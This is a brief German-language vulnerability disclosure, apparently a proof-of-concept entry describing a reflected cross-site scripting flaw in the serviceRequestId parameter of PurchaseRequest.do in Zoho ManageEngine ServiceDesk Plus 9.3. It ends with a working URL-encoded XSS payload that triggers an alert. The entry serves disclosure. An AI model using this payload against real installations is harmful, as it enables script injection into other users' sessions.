
Proof-of-Concept-XSS-Exploit für Zoho ManageEngine ServiceDesk Plus 9.3 über den Parameter serviceRequestId von PurchaseRequest.do, der eine reflektierte Cross-Site-Scripting-Schwachstelle demonstriert.
Informationsbeschreibung: In Zoho ManageEngine ServiceDesk Plus 9.3 wurde ein Problem entdeckt. Es liegt eine XSS-Schwachstelle über den Parameter serviceRequestId in PurchaseRequest.do vor.
Autor: Concobe vom Tarantula Team - VinCSS (ein Mitglied der Vingroup)
domain/PurchaseRequest.do?operation=getAssociatedPrsForSR&serviceRequestId=1%3Cimg%20src%3da%20onerror%3dalert(%27XSS%27)%3E1